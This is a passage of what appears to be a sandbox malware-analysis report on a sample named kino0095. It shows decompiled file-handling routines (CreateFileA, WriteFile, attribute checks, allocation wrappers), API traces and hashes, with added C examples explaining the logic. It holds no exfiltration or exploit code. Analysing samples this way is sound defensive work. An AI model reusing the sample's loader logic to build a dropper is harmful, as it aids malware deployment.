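    /* Constructed sample: 2023-03-15 12:34:56 packed the way a CAB or ZIP entry stores it. */
    uint16_t date = 0x566F, time = 0x645C;
    dos_datetime dt = dos_decode(date, time);
    printf("%04d-%02d-%02d %02d:%02d:%02d -> FILETIME %llu\n",
           dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second,
           (unsigned long long)dos_to_filetime(date, time));
    return 0;
}
```

Two consequences are visible directly from the code: consecutive DOS time values are 20,000,000 ticks (2 s) apart, and a zero date word decodes to month 0, which is rejected exactly as DosDateTimeToFileTime rejects it, so the listing's early `return 0` path is the one taken for such entries.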

C-Code - Quality: 75%
			E010B487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E010B490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

Statement addresses: 0x010b4880 0x010b488c 0x010b4894 0x010b48a0 0x010b48c9 0x010b48ce 0x010b48a2 0x010b48a8 0x010b48b7 0x010b48bc 0x010b48aa 0x010b48ac 0x010b48ac 0x010b48a8 0x010b48de 0x010b48e7 0x010b490b 0x010b48ee 0x010b48f0 0x00000000 0x010b4902

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010B4A23,?,010B4F67,*MEMCAB,00008000,00000180), ref: 010B48DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010B4F67,*MEMCAB,00008000,00000180), ref: 010B4902
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: e76b942797b70466d175e372ecd72b1f89e3a672179403f1fbe8b1944a765885
• Instruction ID: b5d590ee48d1a6d0a60a2c987272c8e4a4aaee05ae4a8b90f4a3924a8852405d
• Opcode Fuzzy Hash: e76b942797b70466d175e372ecd72b1f89e3a672179403f1fbe8b1944a765885
• Instruction Fuzzy Hash: 2F0124A3E125702AF26540298CC8BFB595CCB96634F1A0635AEEBE72C2D5684D0482E0
Uniqueness

Uniqueness Score: -1.00%
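E010B487A receives a C-runtime style open mode in edx and folds it into CreateFileA arguments: the low two bits pick the access mask, and the 0x100, 0x200 and 0x400 bits (the MSVC _O_CREAT, _O_TRUNC and _O_EXCL values) pick the creation disposition, with 0x80 (FILE_ATTRIBUTE_NORMAL) as the attribute. The `sbb reg, reg` lines are branch-free masks; the decompiler prints them as `~(x & bit)`, which should be read as "all ones if the bit is set, else zero" (my reading of the listing, and the one that makes the dispositions come out as TRUNCATE_EXISTING/OPEN_EXISTING, CREATE_ALWAYS/OPEN_ALWAYS and CREATE_NEW). If the first CreateFileA fails and the disposition was not OPEN_EXISTING, the function calls E010B490C on the path, whose body is not shown, and retries once; the "*MEMCAB" string in the recorded arguments is consistent with cabinet extraction but the page does not identify the caller. The C below is an added example, not code from the report or the sample: it reproduces the decision table and the retry shape so the expected values can be checked; the open/fixup hooks and the test double are hypothetical stand-ins for CreateFileA and E010B490C.

```c
#include <stdint.h>
#include <stdio.h>
#include <inttypes.h>

/* CRT open-mode bits as MSVC's fcntl.h defines them (prefixed to avoid the host's fcntl.h).
 * These are the exact constants the listing tests. */
#define CRT_O_RDONLY 0x0000u
#define CRT_O_WRONLY 0x0001u
#define CRT_O_RDWR   0x0002u
#define CRT_O_CREAT  0x0100u
#define CRT_O_TRUNC  0x0200u
#define CRT_O_EXCL   0x0400u

/* Win32 values the function produces. */
#define GENERIC_READ      0x80000000u
#define GENERIC_WRITE     0x40000000u
#define CREATE_NEW        1u
#define CREATE_ALWAYS     2u
#define OPEN_EXISTING     3u
#define OPEN_ALWAYS       4u
#define TRUNCATE_EXISTING 5u

/* The "neg ; sbb reg, reg" idiom: all ones if v is nonzero, else zero. This is what the
 * decompiler prints as ~(x & bit) in the listing (assumption about the underlying asm). */
static uint32_t mask_if(uint32_t v) { return v ? 0xffffffffu : 0u; }

/* _t18 in the listing: read-only opens get GENERIC_READ; any other mode gets GENERIC_WRITE
 * alone, because 0xc0000000 + 0x80000000 wraps to 0x40000000 in 32 bits. */
uint32_t access_from_oflag(uint32_t oflag) {
    return (mask_if(oflag & 3u) & 0xc0000000u) + 0x80000000u;
}

/* _t23 in the listing: create/truncate/exclusive bits become a creation disposition. */
uint32_t disposition_from_oflag(uint32_t oflag) {
    if ((oflag & CRT_O_CREAT) == 0)
        return (mask_if(oflag & CRT_O_TRUNC) & 2u) + 3u;           /* 5 : 3 */
    if ((oflag & CRT_O_EXCL) == 0)
        return (mask_if(oflag & CRT_O_TRUNC) & 0xfffffffeu) + 4u;  /* 2 : 4 */
    return CREATE_NEW;
}

/* Hypothetical hooks standing in for CreateFileA and E010B490C; -1 plays INVALID_HANDLE_VALUE. */
typedef intptr_t (*open_fn)(const char *path, uint32_t access, uint32_t disp, void *ctx);
typedef void (*fixup_fn)(const char *path, void *ctx);

intptr_t open_like_listing(const char *path, uint32_t oflag,
                           open_fn opener, fixup_fn fixup, void *ctx) {
    uint32_t access = access_from_oflag(oflag);
    uint32_t disp   = disposition_from_oflag(oflag);
    intptr_t h = opener(path, access, disp, ctx);
    if (h != -1 || disp == OPEN_EXISTING)
        return h;                 /* success, or a plain open the retry could not help */
    fixup(path, ctx);             /* E010B490C(path); its body is not on the page */
    return opener(path, access, disp, ctx);
}

/* Constructed test double: fails the first `fail_first` opens and counts what happened. */
typedef struct { int fail_first, opens, fixups; } fake_fs;

static intptr_t fake_open(const char *path, uint32_t access, uint32_t disp, void *ctx) {
    fake_fs *fs = ctx;
    (void)path; (void)access; (void)disp;
    fs->opens++;
    return fs->opens <= fs->fail_first ? -1 : 42;
}

static void fake_fixup(const char *path, void *ctx) {
    (void)path;
    ((fake_fs *)ctx)->fixups++;
}

/* Runs one open against the double and returns how many CreateFileA-equivalents it took. */
int opens_needed(uint32_t oflag, int fail_first) {
    fake_fs fs = { fail_first, 0, 0 };
    open_like_listing("extracted.bin", oflag, fake_open, fake_fixup, &fs);
    return fs.opens;
}

int main(void) {
    uint32_t modes[] = { CRT_O_RDONLY, CRT_O_WRONLY | CRT_O_CREAT | CRT_O_TRUNC,
                         CRT_O_WRONLY | CRT_O_CREAT | CRT_O_EXCL, CRT_O_RDWR | CRT_O_TRUNC };
    for (size_t i = 0; i < sizeof modes / sizeof modes[0]; i++)
        printf("oflag 0x%04" PRIx32 " -> access 0x%08" PRIx32 " disposition %" PRIu32 "\n",
               modes[i], access_from_oflag(modes[i]), disposition_from_oflag(modes[i]));
    return 0;
}
```

The recorded call `CreateFileA(…, -80000000, …)` in the APIs list is the read-only case of this table (GENERIC_READ); its disposition was not captured, and a read-only open never takes the retry branch because its disposition is always OPEN_EXISTING.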

C-Code - Quality: 93%
			E010B4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x10b858c; // 0x268
				_t9 = E010B3680(_t20);
				if( *0x10b91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x10b8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                                                    						_t25 = _a12;
                                                                                                                                                                                                                                    						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                    							_t14 =  *0x10b9400; // 0xd9e00
                                                                                                                                                                                                                                    							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                    							 *0x10b9400 = _t15;
                                                                                                                                                                                                                                    							if( *0x10b8184 != 0) {
                                                                                                                                                                                                                                    								_t21 =  *0x10b8584; // 0x0
                                                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                                                    									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10b93f8, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

APIs
  • Part of subcall function 010B3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010B369F
  • Part of subcall function 010B3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36B2
  • Part of subcall function 010B3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010B4B05
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: c5d2871ce673295eb486db4ceed67bb76e6e263a65ef994a6cb0370c508c7667
• Instruction ID: 376e0edd25fe2dd5c63b2023033b0446a90250bef64d8360861a59f2923637c6
• Opcode Fuzzy Hash: c5d2871ce673295eb486db4ceed67bb76e6e263a65ef994a6cb0370c508c7667
• Instruction Fuzzy Hash: 2A01C031200200ABD7248F18DCD5FE27B98FB44725F048226FBBAD71E5CB3A9911CB40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B658A(char* __ecx, void* __edx, char* _a4) {
    intOrPtr _t4;
    char* _t6;
    char* _t8;
    void* _t10;
    void* _t12;
    char* _t16;
    intOrPtr* _t17;
    void* _t18;
    char* _t19;

    _t16 = __ecx; // path buffer
    _t10 = __edx; // buffer size
    _t17 = __ecx;
    _t1 = _t17 + 1; // 0x10b8b3f
    _t12 = _t1;
    do { // inline strlen of the path buffer
        _t4 =  *_t17;
        _t17 = _t17 + 1;
    } while (_t4 != 0);
    _t18 = _t17 - _t12; // current path length
    _t2 = _t18 + 1; // 0x10b8b40
    if(_t2 < __edx) { // room left for at least one more character
        _t19 = _t18 + __ecx; // points at the terminating NUL
        if(_t19 > __ecx) {
            _t8 = CharPrevA(__ecx, _t19); // executed
            if( *_t8 != 0x5c) { // append a trailing '\' if the path does not already end in one
                 *_t19 = 0x5c;
                _t19 =  &(_t19[1]);
            }
        }
        _t6 = _a4;
         *_t19 = 0;
        while( *_t6 == 0x20) { // skip leading spaces in the name argument
            _t6 = _t6 + 1;
        }
        return E010B16B3(_t16, _t10, _t6); // subcall with the path buffer, its size and the trimmed name
    }
    return 0x8007007a; // HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER)
}
                                                                                                                                                                                                                                    0x010b65c3
                                                                                                                                                                                                                                    0x010b65c5
                                                                                                                                                                                                                                    0x010b65c8
                                                                                                                                                                                                                                    0x010b65c8
                                                                                                                                                                                                                                    0x010b65c3
                                                                                                                                                                                                                                    0x010b65c9
                                                                                                                                                                                                                                    0x010b65cc
                                                                                                                                                                                                                                    0x010b65d2
                                                                                                                                                                                                                                    0x010b65d1
                                                                                                                                                                                                                                    0x010b65d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b65dc
                                                                                                                                                                                                                                    0x00000000

APIs
• CharPrevA.USER32(010B8B3E,010B8B3F,00000001,010B8B3E,-00000003,?,010B60EC,010B1140,?), ref: 010B65BA
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 0b6c73dc56140a7424f941ab2ab5edd383b7bb716807d3cd4e0de2d79b4f0178
• Instruction ID: cc3434c472f77081ff969d170cfae6b5a8c000c8517b1d3d8a61ee3e64524bfd
• Opcode Fuzzy Hash: 0b6c73dc56140a7424f941ab2ab5edd383b7bb716807d3cd4e0de2d79b4f0178
• Instruction Fuzzy Hash: 3FF042321042509BD331091D98C4BE7BFDDDB85150F1801AEE9DAC3245CA674D5583A0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E010B621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x10b8004; // 0x72151d89
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E010B597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010B44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x10b9124 = E010B6285();
					_t9 = 0;
				}
				return E010B6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x010b6229
0x010b6230
0x010b6247
0x010b626a
0x010b6272
0x010b6249
0x010b6255
0x010b625f
0x010b6264
0x010b6264
0x010b6284

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010B623F
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
  • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 8216bd6f1e1df7a8e0509ecbdde250f101d7524bceffdb17591bead9dd0b2529
• Instruction ID: ebe8ea47af3900743c52eff94ff02fac757b90795b2e5d4b6b96a47d17251a25
• Opcode Fuzzy Hash: 8216bd6f1e1df7a8e0509ecbdde250f101d7524bceffdb17591bead9dd0b2529
• Instruction Fuzzy Hash: F6F0E2B0B00209ABE7A0EB748D81FFE33BCDB54700F4004AAA9C6D7081EE7A9D408750
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B4B60(signed int _a4) {
                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 0x10b8d64)) != 1) {
                                                                                                                                                                                                                                    					_t9 = FindCloseChangeNotification( *(_t15 + 0x10b8d74)); // executed
                                                                                                                                                                                                                                    					if(_t9 == 0) {
                                                                                                                                                                                                                                    						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t15 + 0x10b8d60)) = 1;
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x10b8d60)) = 1;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x10b8d68)) = 0;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x10b8d70)) = 0;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x10b8d6c)) = 0;
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}





0x010b4b66
0x010b4b74
0x010b4b98
0x010b4ba0
0x00000000
0x010b4bac
0x010b4ba4
0x00000000
0x010b4ba4
0x010b4b78
0x010b4b7e
0x010b4b84
0x010b4b8a
0x00000000

APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010B4FA1,00000000), ref: 010B4B98
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 19ef58917faaeab7c3ecf9f6f1327d6189308ab63518b313019ba84f7b80b191
• Instruction ID: dcc4efff5521ab60f415a923c2fb1b0f63240edb661863b330d50437ce93a25b
• Opcode Fuzzy Hash: 19ef58917faaeab7c3ecf9f6f1327d6189308ab63518b313019ba84f7b80b191
• Instruction Fuzzy Hash: FCF01231514B09AE8771AE29CC80ADABBEEAA952603108D2F95EFD2161E7346D41CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E010B66AE(CHAR* __ecx) {
				unsigned int _t1;

				// __ecx holds a path; GetFileAttributesA returns INVALID_FILE_ATTRIBUTES (0xffffffff) on failure
				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					// bit 4 of the attribute mask is FILE_ATTRIBUTE_DIRECTORY (0x10); the decompiler's "!"
					// here most plausibly renders a bitwise NOT, so the call yields 1 for an existing
					// non-directory path and 0 for a directory
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




0x010b66b1
0x010b66ba
0x010b66c7
0x010b66bc
0x010b66be
0x010b66be

APIs
• GetFileAttributesA.KERNELBASE(?,010B4777,?,010B4E38,?), ref: 010B66B1
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: ef5f0a0b436ca06e498b593936a97373340a9774afc9e0f0f85c5bdfe3808ef6
• Instruction ID: a54fa6738d529ee0c888ebb6e4683a7b38b92a0fde3b9561eb5eae4f4e9a3687
• Opcode Fuzzy Hash: ef5f0a0b436ca06e498b593936a97373340a9774afc9e0f0f85c5bdfe3808ef6
• Instruction Fuzzy Hash: 3CB09276232440926A61063568AA5962881A6C123ABE81B90F076C11D4CA3FD846D104
Uniqueness

Uniqueness Score: -1.00%
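
The expression the decompiler emits for E010B66AE above, `!(_t1 >> 4) & 0x00000001`, is ambiguous as C: read literally, `!` is a logical NOT and the function would return 0 for any file whose attribute mask has a bit at or above 0x10 set, which includes every ordinary file (FILE_ATTRIBUTE_ARCHIVE is 0x20, FILE_ATTRIBUTE_NORMAL is 0x80). Read as the bitwise NOT the underlying instruction most likely was, it returns 1 exactly when FILE_ATTRIBUTE_DIRECTORY (0x10) is clear, i.e. "the path exists and is not a directory". The following is an added example, not code from the report or from the sample: it puts both readings side by side over constructed attribute values so the difference is visible, and it assumes the documented GetFileAttributesA return values (INVALID_FILE_ATTRIBUTES and the attribute bit constants are redefined here so the code builds without windows.h; no file is actually opened).

```c
/* Added example, not part of the Joe Sandbox report or the analysed sample.
 * Models the attribute test in E010B66AE without touching the filesystem:
 * the functions take the DWORD GetFileAttributesA would have returned. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Documented Win32 values, redefined so this compiles on any platform. */
#define INVALID_FILE_ATTRIBUTES  0xFFFFFFFFu  /* GetFileAttributesA failure */
#define FILE_ATTRIBUTE_DIRECTORY 0x00000010u  /* bit 4 */
#define FILE_ATTRIBUTE_ARCHIVE   0x00000020u  /* typical for ordinary files */
#define FILE_ATTRIBUTE_NORMAL    0x00000080u  /* reported when no other bit set */

/* Bitwise reading of the decompiled return:  ~(attrs >> 4) & 1
 * -> 1 when FILE_ATTRIBUTE_DIRECTORY is clear, 0 when it is set. */
static int check_bitwise(uint32_t attrs) {
    if (attrs == INVALID_FILE_ATTRIBUTES) return 0;
    return (int)(~(attrs >> 4) & 1u);
}

/* Literal C reading of what the decompiler printed:  !(attrs >> 4) & 1
 * -> 1 only when no attribute bit at or above 0x10 is set at all. */
static int check_logical(uint32_t attrs) {
    if (attrs == INVALID_FILE_ATTRIBUTES) return 0;
    return (int)(!(attrs >> 4) & 1u);
}

/* Plain statement of the bitwise reading: path exists and is not a directory. */
static int exists_and_not_directory(uint32_t attrs) {
    return attrs != INVALID_FILE_ATTRIBUTES &&
           (attrs & FILE_ATTRIBUTE_DIRECTORY) == 0;
}

int main(void) {
    /* Constructed attribute masks, not values observed from the sample. */
    const uint32_t cases[] = {
        INVALID_FILE_ATTRIBUTES,                       /* path does not exist */
        FILE_ATTRIBUTE_DIRECTORY,                      /* a directory */
        FILE_ATTRIBUTE_ARCHIVE,                        /* an ordinary file */
        FILE_ATTRIBUTE_NORMAL,                         /* a file with no other flags */
        FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_ARCHIVE
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        printf("attrs=0x%08x  bitwise=%d  logical=%d  exists_not_dir=%d\n",
               cases[i], check_bitwise(cases[i]), check_logical(cases[i]),
               exists_and_not_directory(cases[i]));
    }
    return 0;
}
```

Under the logical reading an ordinary file carrying only ARCHIVE or NORMAL fails the check, which would make the function useless as a file-presence test; the bitwise reading agrees with `exists_and_not_directory` for every mask, which is the behaviour a loader checking for a dropped component would want.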

C-Code - Quality: 100%
			E010B4CA0(long _a4) {
				void* _t2;

				// thin wrapper: flags 0 = GMEM_FIXED, _a4 is the byte count
				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




0x010b4caa
0x010b4cb1

APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 010B4CAA
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 44ffbb25b5b3d14e5ee04e9485c69cdb90423b4de9200a372716f53deb0594c5
• Instruction ID: a207da434ff4729138ef6cdc3e5536f3778717e0789420096f8531c420ada8f1
• Opcode Fuzzy Hash: 44ffbb25b5b3d14e5ee04e9485c69cdb90423b4de9200a372716f53deb0594c5
• Instruction Fuzzy Hash: 2DB0123214420CF7CF101EC2E809FC53F1DE7C4761F140000F60C460408A7794108795
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E010B4CC0(void* _a4) {
				void* _t2;

				// thin wrapper releasing a block obtained through the GlobalAlloc wrapper E010B4CA0
				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x010b4cc8
                                                                                                                                                                                                                                    0x010b4ccf

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 664b42ce1d308e700cf6ed45f168826612fa8b4a61ff47a78ee5a12a17d38af4
• Instruction ID: 274a755931343419aaca6e3369e6648a6416704a0cae3e55a77e8e02c18a00ba
• Opcode Fuzzy Hash: 664b42ce1d308e700cf6ed45f168826612fa8b4a61ff47a78ee5a12a17d38af4
• Instruction Fuzzy Hash: D6B0123100010CF78F101A42E8088853F1DD7C0360B000010F50C420118B3B98118684
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			// Decompiler output (fragment). Behaviour visible in the code below: leading whitespace
			// (0x20, 0x09, 0x0a, 0x0b, 0x0c, 0x0d) is skipped with CharNextA, then one argument is
			// copied into a 0x104-byte (MAX_PATH) stack buffer, with a doubled quote (0x22 0x22)
			// stored as a literal quote and the copy aborted (returns 0) once 0x104 bytes are reached.
			// The prologue/epilogue implement the MSVC stack-cookie check: *0x10b8004 ^ ebp is saved
			// in _v8 and handed to E010B6CE0 on return.
			E010B5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x10b8004; // 0x72151d89
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
